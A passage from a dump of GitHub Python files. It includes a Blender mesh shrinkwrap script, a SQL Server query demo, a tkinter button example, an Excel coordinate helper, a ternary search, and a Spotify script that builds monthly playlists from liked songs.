raise Exception(\"Obj import failed: '%s'\"%path)\n print(\"imported %s objects\"%(len(bpy.context.selected_objects)))\n ctx = bpy.context.copy()\n ctx['active_object'] = join_into or bpy.context.selected_objects[0]\n ctx['selected_objects'] = bpy.context.selected_objects\n bpy.ops.object.join(ctx)\n print(\"joined into %s\"%ctx['active_object'])\n return ctx['active_object']\n\ndef apply_shrinkwrap (src, dst, subdivisions):\n print(\"Creating modifiers...\")\n subdiv_modifier = dst.modifiers.new(name='subdiv', type='SUBSURF')\n subdiv_modifier.levels = subdivisions\n subdiv_modifier.render_levels = subdivisions\n\n shrinkwrap_modifier = dst.modifiers.new(name='shrinkwrap', type='SHRINKWRAP')\n shrinkwrap_modifier.target = src\n shrinkwrap_modifier.wrap_method = \"PROJECT\"\n shrinkwrap_modifier.cull_face = \"OFF\"\n shrinkwrap_modifier.use_positive_direction = True\n shrinkwrap_modifier.use_negative_direction = True\n\n print(\"Applying modifiers...\")\n bpy.context.scene.objects.active = dst\n bpy.ops.object.modifier_apply(modifier='subdiv')\n bpy.ops.object.modifier_apply(modifier='shrinkwrap')\n print(\"Done\")\n return dst\n\ndef delete_everything_but_object (obj):\n bpy.ops.object.select_all(action='SELECT')\n obj.select = False\n bpy.ops.object.delete()\n obj.select = True\n return obj\n\ndef export_obj (obj, path):\n delete_everything_but_object(obj)\n bpy.ops.export_scene.obj(\n filepath=path,\n use_materials=False,\n keep_vertex_order=True,\n )\n print(\"Done: exported to '%s'\"%path)\n\ndef execute_shrinkwrap (import_path, export_path, subdivisions):\n clear_all_objects()\n obj = import_and_join_obj(import_path)\n result = bpy.ops.mesh.primitive_cube_add()\n cube = bpy.context.active_object\n\n print(\"Imported object = %s\"%obj) # joined obj components\n print(\"Target object = %s\"%cube)\n apply_shrinkwrap(src=obj, dst=cube, subdivisions=subdivisions)\n\n basedir = os.path.split(export_path)[0]\n if basedir and not os.path.exists(basedir):\n os.makedirs(basedir)\n export_obj(cube, export_path)\n\nif __name__ == '__main__':\n if len(argv) < 3:\n print(\"Usage: %s .obj .obj []\"%(args[0]))\n\n DEFAULT_SUBDIVISIONS = 2\n execute_shrinkwrap(\n import_path = argv[1],\n export_path = argv[2],\n subdivisions = DEFAULT_SUBDIVISIONS if len(argv) < 4 else int(argv[3])\n )\n\n # OBJ_IMPORT_PATH = \"/Users/semery/projects/shape-net-utils/car_models/ShapeNetCore.v2/02958343/371c5e74c66d22d451973ec97171fea3/models/model_normalized.obj\"\n # OBJ_EXPORT_PATH = \"/Users/semery/projects/shape-net-utils/shrinkwrap-exports/02958343-371c5e74c66d22d451973ec97171fea3.obj\"\n\n # execute_shrinkwrap(OBJ_IMPORT_PATH, OBJ_EXPORT_PATH, subdivisions = 2)\n","repo_name":"SeijiEmery/shape-net-utils","sub_path":"naive_shrinkwrap.py","file_name":"naive_shrinkwrap.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74923473067","text":"import pypyodbc as odbc # pip install pypyodbc\nimport numpy as np # pip install numpy\n\nDRIVER_NAME = \"SQL SERVER\"\nSERVER_NAME = \"LAPTOP-KBAD6AQA\\SQLEXPRESS\"\nDATABASE_NAME = 'Netflix'\n\nconnection_string = f\"\"\"\n DRIVER={{{DRIVER_NAME}}};\n SERVER={{{SERVER_NAME}}};\n DATABASE={{{DATABASE_NAME}}};\n Trust_Connection=yes;\n\"\"\"\n\nconn = odbc.connect(connection_string)\nprint(conn)\n\ntry:\n # Establish a connection\n conn = odbc.connect(connection_string)\n\n # Create a cursor\n cursor = conn.cursor()\n\n # Example query\n query = \"SELECT * FROM Streaming_Data\"\n cursor.execute(query)\n\n # Fetch and print results\n rows = cursor.fetchall()\n\n # Convert tuples to numpy arrays\n arrays = [np.array(row) for row in rows]\n\n # Remove elements at indices 1, 2, and 3 from each array\n modified_arrays = [np.delete(arr, [1, 2, 3]) for arr in arrays]\n\n # Columns still within a row\n print(\"User_ID index 0, Duration_Watched_Minutes index 1, Genre index 2, Country index 3, Age index 4, Gender index 5, Subscription_Status index 6, Ratings index 7, Languages index 8, Device_Type index 9, Location index 10, Playback_Quality index 11, Interaction_Events index 12\")\n\n # Print the modified arrays\n for modified_arr in modified_arrays[:10]:\n print(modified_arr)\n\nexcept odbc.Error as e:\n print(f\"Error: {e}\")\n\nfinally:\n # Close the connection\n if conn:\n conn.close()","repo_name":"HamiltonWilliamsBusiness/Netflix-Data-Insights","sub_path":"StreamingApplication.py","file_name":"StreamingApplication.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8459798118","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Nado GUI\") #gui 이름 설정\n\nbtn1 = Button(root, text=\"버튼1\")\nbtn1.pack() #버튼 호출\n\nbtn2 = Button(root, padx=5, pady=10, text=\"버튼2\")\nbtn2.pack()\n\nbtn3 = Button(root, padx=10, pady=5, text=\"버튼3\") # padx = 양옆 여백, pady = 위아래 여백 (크기 유동적)\nbtn3.pack()\n\nbtn4 = Button(root, width=10, height=3, text=\"버튼4\") # 버튼 가로 세로 높이 지정 (고정 크기)\nbtn4.pack()\n\nbtn5 = Button(root, highlightbackground='yellow', text=\"버튼5\") # foreground(글자색), background(배경색)\nbtn5.pack()\n\nphoto = PhotoImage(file=\"gui_basic/img.png\")\nbtn6 = Button(root, image=photo)\nbtn6.pack()\n\ndef btncmd():\n print(\"버튼이 클릭되었어요.\")\nbtn7 = Button(root, text=\"동작하는 버튼\", command=btncmd)\nbtn7.pack()\n\n\n\n\n\nroot.mainloop()\n","repo_name":"songyi-park/my-first-practice","sub_path":"gui_basic/2_button.py","file_name":"2_button.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13817306936","text":"class CoordonnéesExcel:\n\n def __init__(self, fichier, feuille, celulle1, celulle2):\n self.feuille = feuille\n self.celulle1 = celulle1\n self.celulle2 = celulle2\n self.fichier = fichier\n self.ws = fichier.Sheets(feuille)\n self.liste = []\n self.itération = -1\n i = 2\n while self.ws.Range(self.celulle1 + str(i)).Value != None:\n self.liste.append([\n self.ws.Range(self.celulle1 + str(i)).Value,\n self.ws.Range(self.celulle2 + str(i)).Value])\n i += 1\n\n\n def get_coordonnées(self):\n self.itération += 1\n try:\n c = self.liste[self.itération]\n except:\n print('Erreur: Le nombre maxi de coordonnées est atteint')\n c = False\n finally:\n return c\n\n\n\n\n def get_tout(self):\n return self.liste\n\n\n\nclass CoordonnéesEcran:\n profile = [\n 'Khalil']\n dictio = {\n 'Espace ajouter': [\n (0, 0),\n [\n 'Dans l\\'activité: gérer les données techniques placez-vous sur: l espace blanc à droite du boutton ajouter, cliquez sur échape pour enregistrer']],\n 'Dossier': [\n (0, 0),\n [\n 'Basculer au bas de la page et placez-vous sur le dossier, cliquez sur échape pour enregister']],\n 'Composant': [\n (0, 0),\n [\n 'Basculer au bas de la page et Cliquez sur le dossier et placez-vous sur: ajouter un composant, cliquez sur échape pour enregister']],\n 'Dossier2': [\n (0, 0),\n [\n 'Apres le rajout de composant basculer au bas de la page et placez-vous sur le dossier, cliquez sur échape pour enregister']],\n 'ChoixDt': [\n (0, 0),\n [\n 'Basculer au bas de la page et Cliquez sur le dossier et placez-vous sur: importer des DT, cliquez sur échape pour enregister']],\n 'Sans Insert': [\n (0, 0),\n [\n 'Au niveau du rajout de modele de DT placez-vous sur le petit dossier à SANS INSERT, cliquez sur échape pour enregister']],\n 'Insert': [\n (0, 0),\n [\n 'Au niveau du rajout de modele de DT placez-vous sur le petit dossier à INSERT, cliquez sur échape pour enregister']],\n 'Operation': [\n (0, 0),\n [\n 'Basculez au bas de la page et placez-vous sur l opération info génerales, cliquez sur échape pour enregister']],\n 'Operation modif': [\n (0, 0),\n [\n 'Cliquer sur l operation info generales et placez-vous sur modifier l operation, cliquez sur échape pour enregister']],\n 'Operation sans ins': [\n (0, 0),\n [\n 'Supprimer une operation, basculez au bas de la page et placez-vous sur l opération info génerales, cliquez sur échape pour enregister']],\n 'Operation sans ins modif': [\n (0, 0),\n [\n 'Après avoir supprimé un opération, liquer sur l operation info generales et placez-vous sur modifier l operation, cliquez sur échape pour enregister']],\n 'Commentaire': [\n (0, 0),\n [\n 'Ouvrez une opération, basculez au bas et placez-vous sur l espace de commentaire, cliquez sur échape pour enregister']],\n 'Espace Valider': [\n (0, 0),\n [\n 'Ouvrez une opération, basculez au bas et placez-vous sur l espace à gauche du button valider, cliquez sur échape pour enregister']],\n 'Fermer': [\n (0, 0),\n [\n 'Basculez au bas de la page et placez-vous sur le boutton fermer, cliquez sur échape pour enregister']] }","repo_name":"KhalBorf/Saisie-Auto","sub_path":"Coordonnées.py","file_name":"Coordonnées.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5168375986","text":"# Ternary search function\ndef TernarySearch(l, r, key, arr): \n\n if (r >= l): \n\n # Find the mid1 and mid2 \n mid1 = l + (r - l) //3\n mid2 = r - (r - l) //3\n\n # Check if key is present at mid1 \n if (arr[mid1] == key):\n return mid1 \n\n # Check if key is present at mid2\n elif (arr[mid2] == key):\n return mid2 \n \n # Check if key is present before mid1\n elif (key < arr[mid1]): \n return TernarySearch(l, mid1 - 1, key, arr) \n \n # Check if key is present after mid2 \n elif (key > arr[mid2]): \n return TernarySearch(mid2 + 1, r, key, arr) \n \n # Check if key is present between mid1 and mid2\n else: \n return TernarySearch(mid1 + 1, mid2 - 1, key, arr) \n \n # key is not present in the array \n return -1\n\nn = int(input(\"Enter the number of elements\\n\"))\n\n# Mapping each element of input into integer and making a list of it\n\narr = list(map(int, input(\"Enter {} elements\\n\".format(n)).split()))\n\n# sorting the list\narr.sort()\n\n# assigning the start and end variable\nl = 0\nr = n-1\n\n# Inputting key to be searched from the user\nkey = int(input(\"Enter the key to be found\\n\"))\n\n# Calling the function and assigning index returned to a variable\ni = TernarySearch(l, r, key, arr) \n\n# printing the output\nprint(key, \"is found at index\", i) \n\n\"\"\"input and output\nEnter the number of elements\n4\nEnter 4 elements\n1 3 2 4\nEnter the key to be found\n3\n3 is found at index 2\ntime complexity O(logN)\nspace complexity O(1)\n\n\"\"\"\n\n\n\n","repo_name":"sukritishah15/DS-Algo-Point","sub_path":"Python/ternary_search.py","file_name":"ternary_search.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":958,"dataset":"github-code","pt":"37"} +{"seq_id":"17301556339","text":"import base64\r\nimport datetime\r\nimport os\r\nimport random\r\nimport re\r\n\r\nimport pandas as pd\r\nimport requests\r\nimport spotipy\r\nfrom dotenv import load_dotenv\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\n\r\nload_dotenv()\r\n\r\n# https://englishstudyhere.com/grammar/adjectives/150-most-common-adjectives/\r\nword_list = ['macabre', 'unequaled', 'brawny', 'wicked', 'obscene', 'stupendous', 'spiteful', 'quarrelsome', 'naive',\r\n 'pushy', 'classy', 'crooked', 'obtainable', 'cute', 'highfalutin', 'well-groomed', 'smiling', 'previous',\r\n 'excited', 'black-and-white', 'burly', 'vast', 'tense', 'pleasant', 'wasteful', 'noiseless', 'shallow',\r\n 'available', 'dusty', 'gabby', 'barbarous', 'instinctive', 'wandering', 'merciful', 'cumbersome',\r\n 'omniscient', 'maniacal', 'entertaining', 'exciting', 'relieved', 'grotesque', 'heavy', 'amusing',\r\n 'doubtful', 'daffy', 'upbeat', 'picayune', 'versed', 'tasteless', 'hypnotic', 'furry', 'brown',\r\n 'wholesale', 'well-made', 'roasted', 'petite', 'tiresome', 'gentle', 'full', 'grieving', 'abhorrent',\r\n 'unused', 'ludicrous', 'enchanted', 'hesitant', 'rainy', 'sick', 'raspy', 'strong', 'cut', 'angry',\r\n 'cultured', 'wealthy', 'fine', 'political', 'vulgar', 'awake', 'plucky', 'truthful', 'rampant', 'future',\r\n 'uninterested', 'slippery', 'zippy', 'automatic', 'sad', 'ill-informed', 'obnoxious', 'tangy', 'cool',\r\n 'flashy', 'frail', 'swanky', 'crowded', 'sincere', 'unequal', 'equal', 'cooing', 'aboard', 'whole',\r\n 'godly', 'silent', 'acidic', 'excellent', 'dependent', 'beneficial', 'upset', 'sleepy', 'probable',\r\n 'disagreeable', 'narrow', 'waggish', 'super', 'addicted', 'abrasive', 'silent', 'wiry', 'square',\r\n 'healthy', 'thoughtless', 'skinny', 'new', 'vagabond', 'useful', 'onerous', 'humorous', 'weary',\r\n 'grateful', 'acrid', 'resolute', 'zany', 'diligent', 'hard', 'concerned', 'testy', 'accessible',\r\n 'adjoining', 'tight', 'medical', 'enchanting', 'scarce', 'easy', 'ragged', 'luxuriant', 'greedy', 'odd',\r\n 'steady', 'lavish', 'ten', 'ablaze', 'chilly', 'cloistered', 'invincible', 'longing', 'uptight', 'tenuous',\r\n 'miniature', 'good', 'best', 'ambitious', 'white', 'marvelous', 'breezy', 'trite', 'colossal',\r\n 'harmonious', 'cynical', 'depressed', 'fretful', 'tired', 'recondite', 'selective', 'direful', 'economic',\r\n 'clammy', 'agonizing', 'smelly', 'torpid', 'aquatic', 'safe', 'lame', 'kaput', 'old-fashioned', 'fabulous',\r\n 'wise', 'evasive', 'belligerent', 'famous', 'remarkable', 'powerful', 'abashed', 'fragile', 'subsequent',\r\n 'nippy', 'cruel', 'gray', 'moldy', 'unwieldy', 'tacky', 'breakable', 'anxious', 'fanatical', 'volatile',\r\n 'stupid', 'true', 'determined', 'rebel', 'warm', 'massive', 'unruly', 'exotic', 'jumbled', 'splendid',\r\n 'waiting', 'inexpensive', 'sudden', 'hissing', 'rural', 'combative', 'pumped', 'watery', 'second-hand',\r\n 'fixed', 'historical', 'scary', 'royal', 'endurable', 'spotless', 'common', 'bewildered', 'foamy',\r\n 'deadpan', 'guarded', 'enormous', 'friendly', 'soft', 'dry', 'tranquil', 'statuesque', 'snotty', 'dull',\r\n 'chief', 'hallowed', 'tasteful', 'gruesome', 'giddy', 'hushed', 'gaudy', 'subdued', 'cheerful',\r\n 'hard-to-find', 'black', 'madly', 'bawdy', 'bite-sized', 'innocent', 'premium', 'functional',\r\n 'substantial', 'handy', 'wrathful', 'teeny-tiny', 'simplistic', 'abundant', 'ratty', 'wide', 'boorish',\r\n 'mammoth', 'stormy', 'nimble', 'useless', 'red', 'gratis', 'shiny', 'macho', 'daily', 'melodic', 'warlike',\r\n 'piquant', 'unusual', 'wacky', 'tidy', 'bustling', 'lyrical', 'cautious', 'guttural', 'acoustic', 'cute',\r\n 'curved', 'ugly', 'woebegone', 'righteous', 'irate', 'workable', 'ethereal', 'scientific', 'heartbreaking',\r\n 'mountainous', 'used', 'psychotic', 'pastoral', 'amused', 'broken', 'long', 'modern', 'erect', 'capable',\r\n 'obese', 'astonishing', 'elated', 'cluttered', 'fast', 'scared', 'sore', 'lewd', 'itchy', 'willing',\r\n 'enthusiastic', 'flaky', 'sordid', 'difficult', 'magnificent', 'shocking', 'various', 'gamy', 'proud',\r\n 'unwritten', 'short', 'clean', 'blue', 'aspiring', 'lowly', 'absorbed', 'many', 'big', 'slimy', 'purring',\r\n 'tasty', 'rare', 'industrious', 'graceful', 'wry', 'grouchy', 'plausible', 'cloudy', 'pathetic', 'lively',\r\n 'deep', 'five', 'next', 'dashing', 'windy', 'cagey', 'accurate', 'amazing', 'conscious', 'whimsical',\r\n 'filthy', 'fair', 'supreme', 'aloof', 'lucky', 'eatable', 'soggy', 'erratic', 'simple', 'third', 'labored',\r\n 'violent', 'understood', 'insidious', 'sweltering', 'jealous', 'devilish', 'brief', 'gorgeous', 'ugliest',\r\n 'possessive', 'silky', 'abnormal', 'mushy', 'tense', 'creepy', 'repulsive', 'noisy', 'ripe', 'gigantic',\r\n 'teeny', 'dangerous', 'voracious', 'alluring', 'extra-small', 'sticky', 'shut', 'ill-fated', 'dirty',\r\n 'vengeful', 'afraid', 'grandiose', 'material', 'rustic', 'finicky', 'alcoholic', 'dynamic', 'abortive',\r\n 'elastic', 'strange', 'broad', 'outrageous', 'limping', 'blushing', 'glib', 'nice', 'joyous', 'arrogant',\r\n 'nervous', 'six', 'mixed', 'small', 'embarrassed', 'flat', 'careful', 'ceaseless', 'awful', 'calm',\r\n 'unsightly', 'thin', 'evanescent', 'disillusioned', 'redundant', 'synonymous', 'silly', 'worried',\r\n 'heavenly', 'wide-eyed', 'periodic', 'average', 'towering', 'bouncy', 'solid', 'smoggy', 'unbecoming',\r\n 'glossy', 'quack', 'nutritious', 'aback', 'female', 'dispensable', 'disgusting', 'illustrious', 'half',\r\n 'ignorant', 'first', 'rude', 'eight', 'educated', 'malicious', 'incredible', 'living', 'hilarious',\r\n 'funny', 'loud', 'sneaky', 'discreet', 'eager', 'normal', 'childlike', 'spiky', 'condemned', 'exclusive',\r\n 'resonant', 'great', 'happy', 'yummy', 'ancient', 'private', 'ruthless', 'lamentable', 'weak', 'ashamed',\r\n 'imperfect', 'divergent', 'symptomatic', 'flowery', 'pretty', 'sloppy', 'gleaming', 'jaded', 'knotty',\r\n 'messy', 'hellish', 'lovely', 'handsomely', 'unnatural', 'amuck', 'taboo', 'alert', 'optimal',\r\n 'questionable', 'fantastic', 'witty', 'judicious', 'elderly', 'few', 'halting', 'ajar', 'drunk',\r\n 'yielding', 'groovy', 'wary', 'unhealthy', 'squeamish', 'long-term', 'damp', 'special', 'disgusted',\r\n 'complex', 'right', 'early', 'slow', 'hollow', 'faded', 'whispering', 'even', 'bright', 'past', 'alleged',\r\n 'obsequious', 'habitual', 'billowy', 'glistening', 'victorious', 'stingy', 'delirious', 'gifted',\r\n 'jittery', 'rabid', 'steadfast', 'outstanding', 'defiant', 'unbiased', 'spicy', 'minor', 'laughable',\r\n 'electric', 'feeble', 'open', 'physical', 'disastrous', 'humdrum', 'scattered', 'quizzical', 'poor',\r\n 'secret', 'materialistic', 'alike', 'harsh', 'sable', 'skillful', 'slim', 'separate', 'kind', 'pointless',\r\n 'alive', 'zonked', 'beautiful', 'detailed', 'demonic', 'furtive', 'greasy', 'fertile', 'dramatic',\r\n 'trashy', 'violet', 'obedient', 'moaning', 'huge', 'numberless', 'uneven', 'callous', 'horrible',\r\n 'scintillating', 'puzzling', 'jumpy', 'lethal', 'serious', 'well-to-do', 'deeply', 'last', 'hysterical',\r\n 'present', 'tearful', 'acceptable', 'festive', 'sophisticated', 'lacking', 'two', 'shaky', 'nauseating',\r\n 'ossified', 'tacit', 'adamant', 'somber', 'phobic', 'damaged', 'impartial', 'striped', 'earthy',\r\n 'befitting', 'flagrant', 'motionless', 'same', 'blue-eyed', 'earsplitting', 'penitent', 'hapless',\r\n 'spiritual', 'internal', 'psychedelic', 'poised', 'naughty', 'quiet', 'faithful', 'womanly', 'nondescript',\r\n 'annoying', 'curious', 'cooperative', 'abject', 'shaggy', 'crazy', 'panicky', 'uttermost', 'exuberant',\r\n 'chivalrous', 'meaty', 'worthless', 'young', 'juicy', 'boundless', 'garrulous', 'makeshift', 'puny',\r\n 'likeable', 'wild', 'wonderful', 'cuddly', 'reflective', 'high', 'zesty', 'pale', 'awesome', 'chemical',\r\n 'verdant', 'certain', 'icky', 'glorious', 'changeable', 'peaceful', 'rambunctious', 'charming', 'tart',\r\n 'therapeutic', 'legal', 'ordinary', 'superb', 'jagged', 'unique', 'brainy', 'smooth', 'quick', 'far-flung',\r\n 'organic', 'hateful', 'defective', 'domineering', 'knowing', 'momentous', 'wakeful', 'caring', 'absurd',\r\n 'ambiguous', 'three', 'literate', 'stiff', 'foregoing', 'kindhearted', 'public', 'deranged', 'draconian',\r\n 'salty', 'oafish', 'nonchalant', 'immense', 'quaint', 'frightening', 'forgetful', 'apathetic',\r\n 'delightful', 'wanting', 'icy', 'sulky', 'mundane', 'encouraging', 'obeisant', 'neighborly', 'lying',\r\n 'better', 'decorous', 'flimsy', 'incandescent', 'auspicious', 'deserted', 'uncovered', 'well-off',\r\n 'hanging', 'nasty', 'one', 'spotty', 'melted', 'fresh', 'adventurous', 'perfect', 'aware', 'needy',\r\n 'nifty', 'honorable', 'tall', 'attractive', 'overjoyed', 'energetic', 'shrill', 'nappy', 'miscreant',\r\n 'rhetorical', 'rich', 'fearful', 'paltry', 'ritzy', 'efficacious', 'tested', 'productive', 'overconfident',\r\n 'meek', 'fluttering', 'null', 'prickly', 'elegant', 'handsome', 'milky', 'real', 'imminent', 'fearless',\r\n 'oval', 'painful', 'bashful', 'puffy', 'undesirable', 'helpful', 'lush', 'typical', 'lively', 'nutty',\r\n 'mere', 'disturbed', 'scandalous', 'late', 'foolish', 'bitter', 'agreeable', 'nosy', 'interesting',\r\n 'curvy', 'selfish', 'colorful', 'possible', 'ready', 'responsible', 'frantic', 'aggressive', 'temporary',\r\n 'cold', 'adhesive', 'homely', 'fortunate', 'rapid', 'learned', 'gusty', 'unknown', 'thoughtful', 'elfin',\r\n 'reminiscent', 'outgoing', 'aboriginal', 'ahead', 'marked', 'seemly', 'plastic', 'idiotic', 'hulking',\r\n 'dapper', 'old', 'grey', 'zealous', 'ubiquitous', 'tremendous', 'lumpy', 'knowledgeable', 'mature',\r\n 'obsolete', 'steep', 'faulty', 'bumpy', 'stimulating', 'threatening', 'hideous', 'goofy', 'bad', 'mute',\r\n 'annoyed', 'delicate', 'untidy', 'permissible', 'intelligent', 'abrupt', 'overt', 'hungry', 'rough',\r\n 'bloody', 'tan', 'lean', 'decisive', 'tawdry', 'flawless', 'holistic', 'bizarre', 'tiny', 'imaginary',\r\n 'magical', 'heady', 'quixotic', 'empty', 'thankful', 'languid', 'terrible', 'cowardly', 'irritating',\r\n 'didactic', 'dusty', 'majestic', 'courageous', 'numerous', 'fuzzy', 'hospitable', 'false', 'coordinated',\r\n 'racial', 'abaft', 'quickest', 'inquisitive', 'clever', 'bright', 'clumsy', 'infamous', 'petite', 'like',\r\n 'jolly', 'large', 'mellow', 'tender', 'troubled', 'important', 'abiding', 'scrawny', 'wistful', 'careless',\r\n 'wiggly', 'utopian', 'assorted', 'rightful', 'receptive', 'capricious', 'thinkable', 'loving', 'able',\r\n 'dysfunctional', 'free', 'bent', 'elite', 'protective', 'efficient', 'lonely', 'impolite', 'overwrought',\r\n 'envious', 'homeless', 'nonstop', 'plant', 'precious', 'abstracted', 'ad', 'hoc', 'accidental', 'dark',\r\n 'yellow', 'nostalgic', 'glamorous', 'romantic', 'loutish', 'freezing', 'unable', 'drab', 'tame', 'ultra',\r\n 'impossible', 'deafening', 'straight', 'secretive', 'clear', 'satisfying', 'ill', 'familiar', 'terrific',\r\n 'dead', 'overrated', 'sweet', 'valuable', 'tough', 'aberrant', 'needless', 'voiceless', 'tangible',\r\n 'vivacious', 'absorbing', 'axiomatic', 'lackadaisical', 'painstaking', 'hot', 'squealing', 'gainful',\r\n 'pink', 'imported', 'truculent', 'placid', 'giant', 'profuse', 'exultant', 'stale', 'male', 'brave',\r\n 'animated', 'second', 'squalid', 'curly', 'kindly', 'dear', 'fat', 'thundering', 'frequent', 'shy',\r\n 'screeching', 'gullible', 'polite', 'abandoned', 'measly', 'flippant', 'quirky', 'panoramic', 'debonair',\r\n 'incompetent', 'dizzy', 'futuristic', 'busy', 'inconclusive', 'chunky', 'fancy', 'abounding', 'uppity',\r\n 'juvenile', 'acid', 'parched', 'mindless', 'savory', 'lazy', 'unkempt', 'sore', 'far', 'eminent', 'purple',\r\n 'orange', 'keen', 'complete', 'lopsided', 'parallel', 'robust', 'swift', 'murky', 'pricey', 'unarmed',\r\n 'calculating', 'expensive',\r\n 'Jacketed', 'Jacobean', 'Jaded', 'Jaggy', 'Jamaican', 'Jammed', 'Jangling', 'Jarred', 'Jaunty',\r\n 'Jawed', 'Jealous', 'Jeering', 'Jerky', 'Jestful', 'Jiggish', 'Jocular', 'Jointed', 'Jolly',\r\n 'Journalistic', 'Jovial', 'Joyful', 'Joyless', 'Jubilant', 'Judaic', 'Judge', 'Judgmental', 'Judicial',\r\n 'Jugular', 'Juiceless', 'Junior', 'Jurassic', 'Jurist', 'Just', 'Justifiable', 'Jutting', 'Juvenile']\r\nword_list = [word.lower() for word in word_list]\r\n\r\nREQUEST_SIZE = 50\r\nONLY_PROCESS_CURRENT_MONTH = True\r\nscope = \"user-library-read,playlist-modify-public,playlist-modify-private,playlist-read-private,playlist-read-collaborative,ugc-image-upload\"\r\n\r\ntry:\r\n spotify = spotipy.Spotify(\r\n auth_manager=SpotifyOAuth(scope=scope, cache_path=r'/data/token.txt', client_id=os.getenv('SPOTIFY_CLIENT_ID'),\r\n client_secret=os.getenv('SPOTIFY_CLIENT_SECRET'),\r\n redirect_uri=os.getenv('SPOTIFY_REDIRECT_URI')))\r\nexcept:\r\n spotify = spotipy.Spotify(\r\n auth_manager=SpotifyOAuth(scope=scope, cache_path=r'data/token.txt', client_id=os.getenv('SPOTIFY_CLIENT_ID'),\r\n client_secret=os.getenv('SPOTIFY_CLIENT_SECRET'),\r\n redirect_uri=os.getenv('SPOTIFY_REDIRECT_URI')))\r\n\r\nuser_id = spotify.current_user()['id']\r\nprint(\"Logged in as \" + spotify.me()['display_name'])\r\n\r\n\r\ndef get_saved_tracks(full_query=False):\r\n print('Getting {} saved tracks'.format('all' if full_query else 'first {} tracks'.format(REQUEST_SIZE)))\r\n results = spotify.current_user_saved_tracks(limit=REQUEST_SIZE)\r\n tracks = results['items']\r\n if full_query:\r\n while results['next']:\r\n results = spotify.next(results)\r\n tracks.extend(results['items'])\r\n\r\n df = pd.DataFrame(tracks)\r\n # group df by added_at by month\r\n df['added_at'] = pd.to_datetime(df['added_at'])\r\n df['added_at'] = df['added_at'].apply(lambda x: x.replace(tzinfo=None))\r\n df['year_month'] = df['added_at'].dt.to_period('M')\r\n df['year_month'] = df['year_month'].astype(str)\r\n print(df)\r\n return df\r\n\r\n\r\ndef get_as_base64(url):\r\n return base64.b64encode(requests.get(url).content)\r\n\r\n\r\ndef get_all_playlists():\r\n results = spotify.current_user_playlists(limit=REQUEST_SIZE)\r\n playlists = results['items']\r\n while results['next']:\r\n results = spotify.next(results)\r\n playlists.extend(results['items'])\r\n return playlists\r\n\r\n\r\ndef get_playlist_tracks(playlist_id):\r\n results = spotify.playlist_items(playlist_id, limit=REQUEST_SIZE)\r\n tracks = results['items']\r\n while results['next']:\r\n results = spotify.next(results)\r\n tracks.extend(results['items'])\r\n return tracks\r\n\r\n\r\nplaylists = get_all_playlists()\r\n# remove duplicate fun words from the word list\r\nfor playlist in playlists:\r\n if re.match(r'.+📆\\d{4}-\\d{2}', playlist['description']):\r\n # get the fun word with \\s([A-Za-z-]+)\\s\r\n fun_word = re.search(r'\\s([A-Za-z-]+)\\s', playlist['name']).group(1)\r\n if fun_word in word_list:\r\n word_list.remove(fun_word)\r\nplaylist_names = [playlist['name'] for playlist in playlists]\r\nplaylist_descriptions = [playlist['description'] for playlist in playlists]\r\n\r\n\r\ndef get_description_key(year_month):\r\n return f\"📆{year_month}\"\r\n\r\n\r\ndef make_description(year_month):\r\n return f\"🤖 generated playlist for {get_description_key(year_month)}\"\r\n\r\n\r\n# delete YYYY-MM playlists\r\ndef delete_playlists():\r\n for playlist in playlists:\r\n if re.match(r'.+📆\\d{4}-\\d{2}', playlist['description']):\r\n print(f\"Deleting playlist {playlist['name']}\")\r\n spotify.current_user_unfollow_playlist(playlist_id=playlist['id'])\r\n\r\n\r\ndef make_creative_name(month, year):\r\n # print(f\"Making creative name for {month} {year}\")\r\n # find a random word from the list whose first letter is the same as the first letter of the month\r\n filtered_word_list = [word for word in word_list if word[0] == month.lower()[0]]\r\n # print(f\"Filtered word list: {filtered_word_list}\")\r\n random_word = random.choice(filtered_word_list)\r\n # remove the word from the list, so it can't be used again\r\n word_list.remove(random_word)\r\n return f'{year[2:4]} {random_word.capitalize()} {month}'\r\n # return f'{word} {month}'\r\n\r\n\r\n# Gets the ID of an existing playlist based on name, or creates a new playlist if it doesn't exist\r\ndef get_playlist_id_by_key(year_month=''):\r\n month = datetime.datetime.strptime(year_month, '%Y-%m').strftime('%B')\r\n description = make_description(year_month)\r\n description_key = get_description_key(year_month)\r\n\r\n for playlist in playlists:\r\n if description_key in playlist['description']:\r\n # print(f\"Found existing playlist {playlist['name']}\")\r\n return playlist['id']\r\n\r\n name = make_creative_name(month, year_month)\r\n playlist = spotify.user_playlist_create(user=user_id, name=name, public=True, collaborative=False,\r\n description=description)\r\n print(f'Created playlist {name}')\r\n return playlist['id']\r\n # else:\r\n # print(f\"Playlist for {year_month} already exists\")\r\n # return [playlist['id'] for playlist in playlists if playlist['description'] == description][0]\r\n\r\n\r\n# days of week: 0 = Monday, 6 = Sunday\r\n# backup_playlist(\"Discover Weekly\", \"DW \", \"🤖 generated backup playlist for Discover Weekly\", 4, False)\r\ndef backup_playlist(original_name, backup_name, backup_description, day_of_week, use_cover_image):\r\n print(f\"Backing up playlist {original_name} to {backup_name}\")\r\n # check day of week\r\n if pd.Timestamp.today().dayofweek != day_of_week:\r\n print(f\" Today is not day {day_of_week}, skipping backup\")\r\n return\r\n # get the playlist ID of the original playlist, this is an array but should only have zero or one item\r\n playlist_id = [playlist['id'] for playlist in playlists if playlist['name'] == original_name]\r\n if not len(playlist_id):\r\n return\r\n\r\n playlist_id = playlist_id[0]\r\n # check if the backup playlist already exists, this is an array but should only have zero or one item\r\n if len([playlist['id'] for playlist in playlists if playlist['name'] == backup_name]):\r\n print(f\" Backup playlist {backup_name} already exists\")\r\n return\r\n new_playlist = spotify.user_playlist_create(user=user_id, name=backup_name, public=False, collaborative=False,\r\n description=backup_description)\r\n\r\n backup_id = 